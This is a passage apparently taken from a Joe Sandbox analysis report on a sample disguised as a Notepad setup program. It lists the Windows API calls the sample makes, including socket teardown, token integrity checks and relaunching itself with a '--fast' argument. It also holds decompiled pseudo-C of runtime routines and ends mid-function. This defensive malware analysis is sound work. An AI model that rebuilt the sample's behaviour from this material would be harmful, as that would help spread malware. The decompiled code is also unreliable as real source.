                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fwrite$fclosefopen
                                      • String ID:
                                      • API String ID: 2063257959-0
                                      • Opcode ID: 0115a404e1b8e991bdb2316a7b23dd672b55659bcbd10aadaa0b4d01aa8b6c09
                                      • Instruction ID: f714504eab1aae642464a440672445ef7d4fc8ae025155dd063f127e432bbfd5
                                      • Opcode Fuzzy Hash: 0115a404e1b8e991bdb2316a7b23dd672b55659bcbd10aadaa0b4d01aa8b6c09
                                      • Instruction Fuzzy Hash: EB51A0B05087019FD710EF26C08461ABBE4AF85718F418C2EE9D9A7381D779E9898B46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F0236 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • shutdown.WS2_32(?,00000001), ref: 006F02B2
                                      • WSAGetLastError.WS2_32(?,00000000,?,006EF6BF,00000000,?,00000000,006EF612,00000000,00000000,?,00000000,006E2DE3,?,00000000,?), ref: 006F02C3
                                      • closesocket.WS2_32(?), ref: 006F0339
                                      • UnregisterWait.KERNEL32(?), ref: 006F037E
                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,006EF6BF,00000000,?,00000000,006EF612,00000000,00000000,?,00000000,006E2DE3), ref: 006F0398
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006F03BE
                                      • UnregisterWait.KERNEL32(?), ref: 006F03DF
                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,006EF6BF,00000000,?,00000000,006EF612,00000000,00000000,?,00000000,006E2DE3), ref: 006F03F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleUnregisterWait$??3@ErrorLastclosesocketshutdown
                                      • String ID: s6nd
                                      • API String ID: 341968980-3381242404
                                      • Opcode ID: 02b17f4d7bed79e38c55a2e9b6723dcb73dabb44929e22bd00f878ada77140a7
                                      • Instruction ID: 96f194a45c0bce48370c0e955b71ad0c2762796d0714053bac5f2d6a8d6cc09c
                                      • Opcode Fuzzy Hash: 02b17f4d7bed79e38c55a2e9b6723dcb73dabb44929e22bd00f878ada77140a7
                                      • Instruction Fuzzy Hash: B8515D71604B06CFEB24CF69C888AA6B7F6FF14315B10491DEA96877A2C730E845CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E4211 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 69stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 006E422C
                                        • Part of subcall function 006E42C5: OpenProcessToken.ADVAPI32(?,00000008,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42D7
                                        • Part of subcall function 006E42C5: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42F2
                                        • Part of subcall function 006E42C5: GetLastError.KERNEL32(?,?,00000000,?,?,006E4238,00000000), ref: 006E42F8
                                        • Part of subcall function 006E42C5: malloc.MSVCRT ref: 006E4306
                                        • Part of subcall function 006E42C5: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E4320
                                        • Part of subcall function 006E42C5: GetSidSubAuthorityCount.ADVAPI32(00000000,?,00000000,?,?,006E4238,00000000), ref: 006E4328
                                        • Part of subcall function 006E42C5: GetSidSubAuthority.ADVAPI32(00000000,?,?,00000000,?,?,006E4238,00000000), ref: 006E4338
                                        • Part of subcall function 006E42C5: ??3@YAXPAX@Z.MSVCRT ref: 006E4341
                                      • GetCommandLineW.KERNEL32 ref: 006E4240
                                      • lstrlenW.KERNEL32(00000000), ref: 006E4252
                                      • calloc.MSVCRT ref: 006E425E
                                      • lstrcpyW.KERNEL32(00000000,00000000), ref: 006E4272
                                      • lstrcatW.KERNEL32(00000000, --fast), ref: 006E427E
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E4291
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E42B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$??3@AuthorityInformationProcess$CommandCountCurrentErrorFileLastLineModuleNameOpencalloclstrcatlstrcpylstrlenmalloc
                                      • String ID: --fast
                                      • API String ID: 2839323878-3566243175
                                      • Opcode ID: 38e00596ac374b9a4b8cc4fa66765b7130f2c752cb1a6bc187e1ffd4f87bec19
                                      • Instruction ID: f97b41bd59ec5a7cf65b6c1b21f013e9b35fc693825a8b33b62a154dd2f4bf0d
                                      • Opcode Fuzzy Hash: 38e00596ac374b9a4b8cc4fa66765b7130f2c752cb1a6bc187e1ffd4f87bec19
                                      • Instruction Fuzzy Hash: 0A11E5721023666FE7206BB2AC9DEFF37AFAF00355F110525FB01D1181DE25CA41D965
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F1FA8 Relevance: 15.1, APIs: 10, Instructions: 137networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$memset
                                      • String ID:
                                      • API String ID: 4054172246-0
                                      • Opcode ID: 67823b63ac2aeac64fa0c6a7a3c734b55739890bfed90c04e06438a8b818e521
                                      • Instruction ID: ca933821de4d39687f5602635cc9f39e7864c95548561f5784dcb8d60076d2fe
                                      • Opcode Fuzzy Hash: 67823b63ac2aeac64fa0c6a7a3c734b55739890bfed90c04e06438a8b818e521
                                      • Instruction Fuzzy Hash: A4519C7240060AAFD721DF65C855BEBBBFAFF08314F108529E686D6281D774EA05CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408E44 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 24%
                                      			E00408E44(signed int __eax, signed char** __ebx, void* __ecx, intOrPtr __edi, signed char* __esi) {
				signed int _t133;
				signed int _t136;
				int _t138;
				signed int _t139;
				signed char* _t140;
				signed char* _t143;
				signed char** _t146;
				void* _t154;
				int _t167;
				signed int _t170;
				void* _t177;
				int _t178;
				signed int _t179;
				int _t180;
				void* _t184;
				void* _t185;
				int _t188;
				void* _t189;
				signed int _t192;
				void _t196;
				signed int _t198;
				signed int _t204;
				signed char** _t207;
				signed int _t210;
				int _t212;
				signed int _t213;
				signed char** _t214;
				void* _t215;
				signed int _t220;
				signed char* _t222;
				void** _t223;
				signed char* _t224;
				signed char* _t225;
				signed int _t227;
				signed int _t228;
				int _t231;
				int _t233;
				void** _t234;
				int _t235;
				intOrPtr _t239;
				intOrPtr _t242;
				signed int _t244;
				signed char* _t245;
				int _t248;
				intOrPtr* _t249;
				int* _t250;
				void** _t253;
				signed char* _t254;
				signed char* _t255;
				signed char* _t256;
				void* _t259;
				void _t261;
				signed char* _t262;
				int _t263;
				void _t264;
				intOrPtr _t265;
				void* _t266;
				intOrPtr* _t269;
				signed char** _t270;
				int* _t275;
				int* _t276;
				int* _t277;
				intOrPtr* _t278;

				_t256 = __esi;
				_t242 = __edi;
				_t215 = __ecx;
				_t207 = __ebx;
				_t133 = __eax;
				while(1) {
					L1:
					_t215 = _t215 + 1;
					_t225 = _t256;
					 *(_t215 - 1) = _t133;
					if(_t133 == 0) {
						break;
					} else {
						goto L2;
					}
					while(1) {
						L2:
						_t133 =  *_t225 & 0x000000ff;
						_t256 =  &(_t225[1]);
						if(_t133 != 0x7f) {
							goto L1;
						}
						_t133 = _t225[1] & 0x000000ff;
						_t215 = _t215 + 1;
						_t225 =  &(_t225[2]);
						 *(_t215 - 1) = _t133;
						if(_t133 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				 *_t269 = _t242;
				L00408484();
				 *(_t266 - 0x2c) = 1;
				_t270 = _t207;
				if(_t133 == 0) {
					L14:
					return  *(_t266 - 0x2c);
				} else {
					 *(_t266 - 0x2c) = E00408C90(_t133, _t266 - 0x28);
					if( *(_t266 - 0x2c) != 0) {
						goto L14;
					} else {
						_t136 =  *( *(_t266 - 0x3c) + 1) & 0x000000ff;
						if(_t136 == 0x2f || _t136 == 0x5c) {
							L15:
							 *_t270 =  *(_t266 - 0x40);
							_t138 = strlen(??);
							_t244 =  *(_t266 - 0x3c);
							_t227 =  *(_t266 - 0x3c);
							_t210 = _t244 + _t138;
							_t139 =  *_t210 & 0x000000ff;
							if(_t244 >= _t210) {
								L20:
								if(_t139 == 0x2f || _t139 == 0x5c) {
									goto L23;
								} else {
									 *(_t266 - 0x61) = 0x5c;
								}
							} else {
								while(_t139 != 0x2f) {
									if(_t139 == 0x5c) {
										goto L20;
									} else {
										_t210 = _t210 - 1;
										_t139 =  *_t210 & 0x000000ff;
										if(_t227 != _t210) {
											continue;
										} else {
											goto L20;
										}
									}
									goto L26;
								}
								goto L26;
								L23:
								_t210 = _t210 + 1;
								_t228 = _t139;
								_t139 =  *_t210 & 0x000000ff;
								if(_t139 == 0x2f || _t139 == 0x5c) {
									goto L23;
								} else {
									 *(_t266 - 0x61) = _t228;
								}
							}
							goto L26;
						} else {
							_t196 =  *(_t266 - 0x40);
							if( *_t196 != 0x2e ||  *((char*)(_t196 + 1)) != 0) {
								goto L15;
							} else {
								if(( *(_t266 - 0x30) & 0x00000010) != 0) {
									_t254 =  *(_t266 - 0x3c);
									_t198 = E00408BF0(_t254,  *(_t266 - 0x30));
									 *(_t266 - 0x2c) = _t198;
									if(_t198 == 0) {
										 *_t270 = _t254;
										_t214 = _t270;
										_t278 = _t270 - E00408390(strlen(??) + 0x10 >> 4 << 4);
										_t224 = _t254;
										_t265 = _t278 + 0xc;
										_t239 = _t265;
										do {
											_t204 =  *_t224 & 0x000000ff;
											_t126 =  &(_t224[1]); // 0x1
											_t255 = _t126;
											if(_t204 != 0x7f) {
												_t224 = _t255;
											} else {
												_t204 = _t224[1] & 0x000000ff;
												_t224 =  &(_t224[2]);
											}
											_t239 = _t239 + 1;
											 *(_t239 - 1) = _t204;
										} while (_t204 != 0);
										 *_t278 = _t265;
										L00408484();
										_t270 = _t214;
										if(_t204 == 0 ||  *((intOrPtr*)(_t266 + 8)) == 0) {
											goto L58;
										} else {
											E00408C90(_t204,  *((intOrPtr*)(_t266 + 8)));
											_t245 =  *(_t266 - 0x20);
										}
									} else {
										_t210 =  *(_t266 - 0x3c);
										goto L12;
									}
								} else {
									L12:
									 *(_t266 - 0x61) = 0x5c;
									 *(_t266 - 0x40) = 0;
									L26:
									_t245 =  *(_t266 - 0x20);
									 *(_t266 - 0x2c) = 2;
									_t140 =  *_t245;
									if(_t140 != 0) {
										 *(_t266 - 0x48) = _t210;
										_t212 = _t245;
										 *(_t266 - 0x3c) =  *(_t266 - 0x30) & 0x00008000;
										do {
											if( *(_t266 - 0x2c) == 1) {
												L32:
												 *(_t266 - 0x2c) = 1;
											} else {
												 *_t270 = _t140;
												_t146 = E00409D60();
												 *(_t266 - 0x34) = _t146;
												if(_t146 == 0) {
													if(( *(_t266 - 0x30) & 0x00000004) != 0) {
														goto L32;
													} else {
														_t249 =  *((intOrPtr*)(_t266 - 0x38));
														if(_t249 != 0) {
															L0040A388();
															_t270[1] =  *_t146;
															 *_t270 =  *_t212;
															if( *_t249() != 0) {
																goto L32;
															}
														}
													}
												} else {
													 *(_t266 - 0x4c) = 0;
													if( *(_t266 - 0x40) != 0) {
														 *_t270 =  *_t212;
														 *(_t266 - 0x4c) = strlen(??);
													}
													 *(_t266 - 0x50) = 0;
													 *((intOrPtr*)(_t266 - 0x60)) =  *(_t266 - 0x4c) + 2;
													while(1) {
														L39:
														 *_t270 =  *(_t266 - 0x34);
														_t154 = E00409F60();
														_t259 = _t154;
														if(_t154 == 0) {
															break;
														}
														if( *(_t266 - 0x3c) == 0 ||  *((intOrPtr*)(_t259 + 8)) == 0x10) {
															_t51 = _t259 + 0xc; // 0xc
															_t248 = _t51;
															if(E004089C0( *(_t266 - 0x48),  *(_t266 - 0x30), _t248) != 0) {
																continue;
															} else {
																_t220 =  *(_t259 + 6) & 0x0000ffff;
																 *(_t266 - 0x54) = _t270;
																_t275 = _t270 - E00408390(_t220 +  *((intOrPtr*)(_t266 - 0x60)) + 0xf >> 4 << 4);
																_t231 =  &(_t275[3]);
																 *(_t266 - 0x58) = _t231;
																_t167 = _t231;
																if( *(_t266 - 0x4c) != 0) {
																	_t261 =  *(_t266 - 0x4c);
																	 *(_t266 - 0x68) = _t220;
																	 *_t275 = _t231;
																	_t275[2] = _t261;
																	_t275[1] =  *_t212;
																	 *(_t266 - 0x5c) = _t231;
																	memcpy(??, ??, ??);
																	_t170 =  *(_t275 + _t261 + 0xb) & 0x000000ff;
																	_t231 =  *(_t266 - 0x5c);
																	_t220 =  *(_t266 - 0x68);
																	if(_t170 == 0x2f || _t170 == 0x5c) {
																		_t167 =  *(_t266 - 0x4c) + _t231;
																	} else {
																		_t264 =  *(_t266 - 0x4c);
																		 *((char*)(_t231 + _t264)) =  *(_t266 - 0x61) & 0x000000ff;
																		_t167 = _t231 + _t264 + 1;
																	}
																}
																 *(_t266 - 0x5c) = _t231;
																_t275[2] = _t220 + 1;
																_t275[1] = _t248;
																_t250 = _t275;
																 *_t275 = _t167;
																memcpy(??, ??, ??);
																 *_t275 =  *(_t266 - 0x5c);
																_t177 = E00408390(strlen(??) + 0x10 >> 4 << 4);
																_t262 =  *(_t266 - 0x58);
																_t276 = _t275 - _t177;
																_t178 =  &(_t276[3]);
																 *(_t266 - 0x5c) = _t178;
																_t233 = _t178;
																while(1) {
																	L46:
																	_t179 =  *_t262 & 0x000000ff;
																	_t222 =  &(_t262[1]);
																	if(_t179 == 0x7f) {
																		break;
																	}
																	_t233 = _t233 + 1;
																	_t262 = _t222;
																	 *(_t233 - 1) = _t179;
																	if(_t179 != 0) {
																		continue;
																	}
																	L48:
																	_t180 =  *(_t266 - 0x5c);
																	 *_t276 = _t180;
																	L00408484();
																	_t277 = _t250;
																	_t263 = _t180;
																	if(_t180 == 0) {
																		 *(_t266 - 0x2c) = 3;
																	} else {
																		 *(_t266 - 0x2c) =  *(_t266 - 0x2c) & (0 |  *(_t266 - 0x2c) == 0x00000002) - 0x00000001;
																		if(( *(_t266 - 0x30) & 0x00000040) == 0) {
																			_t253 =  *(_t266 - 0x50);
																			if(_t253 == 0) {
																				 *_t277 = 0xc;
																				_t184 = malloc(??);
																				 *(_t266 - 0x50) = _t184;
																				if(_t184 != 0) {
																					_t185 =  *(_t266 - 0x50);
																					 *(_t185 + 8) = _t263;
																					 *(_t185 + 4) = 0;
																					 *_t185 = 0;
																				}
																			} else {
																				 *(_t266 - 0x58) = _t212;
																				_t213 =  *(_t266 - 0x30) & 0x00004000;
																				while(1) {
																					_t188 = _t253[2];
																					 *_t277 = _t263;
																					_t277[1] = _t188;
																					if(_t213 != 0) {
																						_t188 = strcoll();
																					} else {
																						L0040A418();
																					}
																					_t223 =  *_t253;
																					_t234 = _t253[1];
																					if(_t188 <= 0) {
																						_t234 = _t223;
																					}
																					if(_t234 == 0) {
																						break;
																					}
																					_t253 = _t234;
																				}
																				_t212 =  *(_t266 - 0x58);
																				 *(_t266 - 0x58) = _t188;
																				 *_t277 = 0xc;
																				_t189 = malloc(??);
																				_t235 =  *(_t266 - 0x58);
																				if(_t189 != 0) {
																					 *(_t189 + 8) = _t263;
																					 *(_t189 + 4) = 0;
																					 *_t189 = 0;
																					if(_t235 <= 0) {
																						 *_t253 = _t189;
																					} else {
																						_t253[1] = _t189;
																					}
																				}
																			}
																		} else {
																			if( *((intOrPtr*)(_t266 + 8)) != 0) {
																				E00408C90(_t263,  *((intOrPtr*)(_t266 + 8)));
																			}
																		}
																	}
																	_t270 =  *(_t266 - 0x54);
																	goto L39;
																}
																_t192 = _t262[1] & 0x000000ff;
																_t233 = _t233 + 1;
																_t262 =  &(_t262[2]);
																 *(_t233 - 1) = _t192;
																if(_t192 != 0) {
																	goto L46;
																}
																goto L48;
															}
														} else {
															continue;
														}
														goto L57;
													}
													 *_t270 =  *(_t266 - 0x34);
													E00409FB0();
													if( *(_t266 - 0x50) != 0) {
														E00408CF0( *(_t266 - 0x50),  *((intOrPtr*)(_t266 + 8)));
													}
												}
											}
											goto L33;
											L33:
											_t143 =  *_t212;
											_t212 = _t212 + 4;
											 *_t270 = _t143;
											E00408660();
											_t140 =  *_t212;
										} while (_t140 != 0);
										L58:
										_t245 =  *(_t266 - 0x20);
									}
								}
							}
						}
						L57:
						 *_t270 = _t245;
						E00408660();
						return  *(_t266 - 0x2c);
					}
				}
			}


































































                                      0x00408e44
                                      0x00408e44
                                      0x00408e44
                                      0x00408e44
                                      0x00408e44
                                      0x00408e48
                                      0x00408e48
                                      0x00408e48
                                      0x00408e4b
                                      0x00408e4d
                                      0x00408e52
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408e54
                                      0x00408e54
                                      0x00408e54
                                      0x00408e57
                                      0x00408e5c
                                      0x00000000
                                      0x00000000
                                      0x00408e5e
                                      0x00408e62
                                      0x00408e65
                                      0x00408e68
                                      0x00408e6d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408e6d
                                      0x00408e54
                                      0x00408e6f
                                      0x00408e6f
                                      0x00408e72
                                      0x00408e77
                                      0x00408e7e
                                      0x00408e82
                                      0x00409188
                                      0x00409195
                                      0x00408e88
                                      0x00408e90
                                      0x00408e98
                                      0x00000000
                                      0x00408e9e
                                      0x00408ea1
                                      0x00408ea7
                                      0x004091e0
                                      0x004091e3
                                      0x004091e6
                                      0x004091eb
                                      0x004091ee
                                      0x004091f1
                                      0x004091f4
                                      0x004091f9
                                      0x00409212
                                      0x00409214
                                      0x00000000
                                      0x0040921a
                                      0x0040921a
                                      0x0040921a
                                      0x00409200
                                      0x00409200
                                      0x00409206
                                      0x00000000
                                      0x00409208
                                      0x00409208
                                      0x0040920b
                                      0x00409210
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409210
                                      0x00000000
                                      0x00409206
                                      0x00000000
                                      0x00409220
                                      0x00409220
                                      0x00409223
                                      0x00409225
                                      0x0040922a
                                      0x00000000
                                      0x00409230
                                      0x00409230
                                      0x00409230
                                      0x0040922a
                                      0x00000000
                                      0x00408eb5
                                      0x00408eb5
                                      0x00408ebb
                                      0x00000000
                                      0x00408ecb
                                      0x00408ecf
                                      0x00409584
                                      0x0040958c
                                      0x00409591
                                      0x00409596
                                      0x004095a0
                                      0x004095a3
                                      0x004095b8
                                      0x004095ba
                                      0x004095bc
                                      0x004095c0
                                      0x004095d4
                                      0x004095d4
                                      0x004095d7
                                      0x004095d7
                                      0x004095dc
                                      0x004095c4
                                      0x004095de
                                      0x004095de
                                      0x004095e2
                                      0x004095e2
                                      0x004095c6
                                      0x004095c9
                                      0x004095cc
                                      0x0040945b
                                      0x0040945e
                                      0x00409463
                                      0x00409467
                                      0x00000000
                                      0x00409470
                                      0x00409473
                                      0x0040947b
                                      0x0040947b
                                      0x00409598
                                      0x00409598
                                      0x00000000
                                      0x00409598
                                      0x00408ed5
                                      0x00408ed5
                                      0x00408ed5
                                      0x00408ed9
                                      0x00409233
                                      0x00409233
                                      0x00409236
                                      0x0040923d
                                      0x00409241
                                      0x0040924a
                                      0x0040924d
                                      0x00409255
                                      0x004092a6
                                      0x004092aa
                                      0x00409288
                                      0x00409288
                                      0x004092ac
                                      0x004092ac
                                      0x004092af
                                      0x004092b4
                                      0x004092b9
                                      0x00409264
                                      0x00000000
                                      0x00409266
                                      0x00409266
                                      0x0040926b
                                      0x0040926d
                                      0x00409274
                                      0x0040927a
                                      0x00409281
                                      0x00000000
                                      0x00000000
                                      0x00409281
                                      0x0040926b
                                      0x004092bb
                                      0x004092be
                                      0x004092c7
                                      0x004092cb
                                      0x004092d3
                                      0x004092d3
                                      0x004092d9
                                      0x004092e3
                                      0x004092f0
                                      0x004092f0
                                      0x004092f3
                                      0x004092f6
                                      0x004092fb
                                      0x004092ff
                                      0x00000000
                                      0x00000000
                                      0x0040930a
                                      0x00409312
                                      0x00409312
                                      0x00409324
                                      0x00000000
                                      0x00409326
                                      0x00409326
                                      0x0040932d
                                      0x00409342
                                      0x00409344
                                      0x00409348
                                      0x0040934b
                                      0x0040934f
                                      0x00409494
                                      0x00409499
                                      0x0040949c
                                      0x0040949f
                                      0x004094a3
                                      0x004094a7
                                      0x004094aa
                                      0x004094af
                                      0x004094b4
                                      0x004094b7
                                      0x004094bc
                                      0x00409576
                                      0x004094ca
                                      0x004094ca
                                      0x004094d1
                                      0x004094d4
                                      0x004094d4
                                      0x004094bc
                                      0x00409358
                                      0x0040935b
                                      0x0040935f
                                      0x00409363
                                      0x00409365
                                      0x00409368
                                      0x00409370
                                      0x00409381
                                      0x00409386
                                      0x00409389
                                      0x0040938b
                                      0x0040938f
                                      0x00409392
                                      0x004093ac
                                      0x004093ac
                                      0x004093ac
                                      0x004093af
                                      0x004093b4
                                      0x00000000
                                      0x00000000
                                      0x004093a0
                                      0x004093a3
                                      0x004093a5
                                      0x004093aa
                                      0x00000000
                                      0x00000000
                                      0x004093c7
                                      0x004093c7
                                      0x004093ca
                                      0x004093cd
                                      0x004093d2
                                      0x004093d4
                                      0x004093d8
                                      0x00409616
                                      0x004093de
                                      0x004093ee
                                      0x004093f5
                                      0x004094dd
                                      0x004094e2
                                      0x004095e7
                                      0x004095ee
                                      0x004095f3
                                      0x004095f8
                                      0x004095fe
                                      0x00409601
                                      0x00409604
                                      0x0040960b
                                      0x0040960b
                                      0x004094e8
                                      0x004094eb
                                      0x004094f3
                                      0x00409516
                                      0x00409516
                                      0x00409519
                                      0x0040951c
                                      0x00409522
                                      0x00409500
                                      0x00409524
                                      0x00409524
                                      0x00409524
                                      0x00409505
                                      0x00409507
                                      0x0040950c
                                      0x0040950e
                                      0x0040950e
                                      0x00409512
                                      0x00000000
                                      0x00000000
                                      0x00409514
                                      0x00409514
                                      0x0040952b
                                      0x0040952e
                                      0x00409531
                                      0x00409538
                                      0x0040953d
                                      0x00409542
                                      0x00409548
                                      0x0040954b
                                      0x00409552
                                      0x0040955a
                                      0x0040957d
                                      0x0040955c
                                      0x0040955c
                                      0x0040955c
                                      0x0040955a
                                      0x00409542
                                      0x004093fb
                                      0x00409400
                                      0x00409569
                                      0x00409569
                                      0x00409400
                                      0x004093f5
                                      0x00409406
                                      0x00000000
                                      0x00409406
                                      0x004093b6
                                      0x004093ba
                                      0x004093bd
                                      0x004093c0
                                      0x004093c5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004093c5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040930a
                                      0x00409438
                                      0x0040943b
                                      0x00409445
                                      0x00409451
                                      0x00409451
                                      0x00409445
                                      0x004092b9
                                      0x00000000
                                      0x0040928f
                                      0x0040928f
                                      0x00409291
                                      0x00409294
                                      0x00409297
                                      0x0040929c
                                      0x0040929e
                                      0x0040948d
                                      0x00409490
                                      0x00409490
                                      0x00409241
                                      0x00408ecf
                                      0x00408ebb
                                      0x0040947d
                                      0x0040947d
                                      0x00409480
                                      0x00409065
                                      0x00409065
                                      0x00408e98

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _strdupmemcpystrlen
                                      • String ID: @$\
                                      • API String ID: 126217880-485402795
                                      • Opcode ID: 33e2115ce8d5890bea047f411af997a1ccd14a75029ed79c00dd22f9642798c4
                                      • Instruction ID: 5db1996a9a765f6b5e0bf04a52373715a988d65b50e301fadc0d474fe81a509c
                                      • Opcode Fuzzy Hash: 33e2115ce8d5890bea047f411af997a1ccd14a75029ed79c00dd22f9642798c4
                                      • Instruction Fuzzy Hash: 93514C71D047598BDB10DFA9C4442AEBBF1AF44304F08846ED895BB382DB39AC46CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408060 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90memoryfileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 29%
                                      			E00408060(void* __ebx, void* __ecx, signed int __edx, long __edi, int __esi, void* __ebp, signed int _a4, char _a8) {
				void* _v16;
				struct _MEMORY_BASIC_INFORMATION* _v20;
				signed int _v24;
				signed int _v64;
				intOrPtr _v72;
				char* _v84;
				int _v88;
				intOrPtr _v92;
				int _v96;
				char** _v100;
				intOrPtr _v120;
				signed int _v144;
				intOrPtr _t55;
				int _t58;
				long _t60;
				signed int _t62;
				intOrPtr _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				signed int _t75;
				void* _t76;
				void* _t84;
				int _t85;
				intOrPtr* _t86;
				void* _t91;
				signed int* _t93;
				intOrPtr _t96;
				signed int _t98;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				void* _t114;
				void* _t120;
				struct _MEMORY_BASIC_INFORMATION* _t124;
				void* _t125;
				signed int _t129;
				int* _t134;
				void* _t136;
				void** _t137;
				int* _t138;
				char** _t139;
				char** _t140;

				_t132 = __ebp;
				_t104 = __edx;
				_t91 = __ecx;
				_t137 = _t136 - 0x14;
				_t55 = __imp___iob;
				_v20 = 0x17;
				_t124 =  &_a8;
				_t3 = _t55 + 0x40; // 0x74894640
				_t84 = _t3;
				_v24 = 1;
				_v16 = _t84;
				 *_t137 = "Mingw runtime failure:\n";
				fwrite(__ebx, __esi, ??, ??);
				_v20 = _t124;
				 *_t137 = _t84;
				_v24 = _a4;
				_t58 = vfprintf(??, ??, ??);
				abort();
				_push(__ebp);
				_t116 = _t104;
				_t125 = _t91;
				_t85 = _t58;
				_t138 = _t137 - 0x3c;
				_v96 = 0x1c;
				_v100 =  &_v84;
				 *_t138 = _t85;
				_t60 = VirtualQuery(_t84, _t124, __edi);
				_t139 = _t138 - 0xc;
				if(_t60 == 0) {
					_v96 = _t85;
					_v100 = 0x1c;
					 *_t139 = "  VirtualQuery failed for %d bytes at address %p";
					E00408060(_t85, _t91, _t104, _t116, _t125, __ebp);
					_t62 =  *0x427044;
					if(_t62 == 0) {
						 *0x427044 = 1;
						_t62 = 0;
						if(0x425930 <= 7) {
							goto L16;
						} else {
							_push(_t116);
							_push(_t125);
							_push(_t85);
							_t140 = _t139 - 0x20;
							_t105 =  *0x425930; // 0x0
							if(0x425930 > 0xb) {
								if(_t105 != 0) {
									_t86 = 0x425930;
									goto L42;
								} else {
									_t62 =  *0x425934; // 0x0
									_t116 = _t62 |  *0x425938;
									if((_t62 |  *0x425938) != 0) {
										_t86 = 0x425930;
										goto L22;
									} else {
										_t105 =  *0x42593c; // 0x0
										_t86 = 0x42593c;
										goto L20;
									}
								}
							} else {
								_t86 = 0x425930;
								L20:
								if(_t105 != 0) {
									L42:
									if(_t86 >= 0x425930) {
										goto L29;
									} else {
										do {
											_t48 = _t86 + 4; // 0x0
											_t106 =  *_t48;
											_t64 =  *_t86;
